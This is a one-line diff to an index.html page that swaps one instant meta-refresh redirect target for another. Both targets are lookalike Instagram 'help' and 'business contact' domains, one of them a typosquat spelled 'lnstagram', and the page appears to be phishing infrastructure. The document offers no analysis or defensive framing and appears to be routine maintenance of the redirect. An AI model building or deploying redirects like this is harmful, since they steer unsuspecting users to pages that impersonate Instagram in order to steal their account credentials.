--- a/index.html
+++ b/index.html
@@ -1,1 +1,1 @@
-<html><head><meta http-equiv="refresh" content="0;URL=http://lnstagram-help-c.cf"></head></html>
+<html><head><meta http-equiv="refresh" content="0;URL=https://service-instagrambusiness.com/business/contact/"></head></html>
